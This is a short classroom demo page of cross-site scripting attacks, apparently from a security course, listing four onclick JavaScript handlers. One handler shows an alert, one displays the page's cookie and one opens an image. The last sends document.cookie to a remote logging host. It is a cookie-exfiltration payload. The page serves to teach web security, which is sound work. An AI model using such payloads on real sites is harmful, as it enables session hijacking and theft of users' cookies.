2. XSS Demos

Click the links below to see the attacks

Demonstrate Vulnerability

onclick="alert('Hi! This is an XSS Vulnerability!')"

Pop Up Cookie

onclick="alert(document.cookie)"

Open Pop-Up Window

onclick="window.open('https://samsclass.info/lulz/ceilingcathh.png', '_blank', 'width=500, height=300')"

Send Cookie to Remote Log

onclick="window.open('https://attack.samsclass.info/post-text.php?text=' + document.cookie, '_blank', 'width=500, height=300')"

Clear Logfile
Posted 10-3-16 by Sam Bowne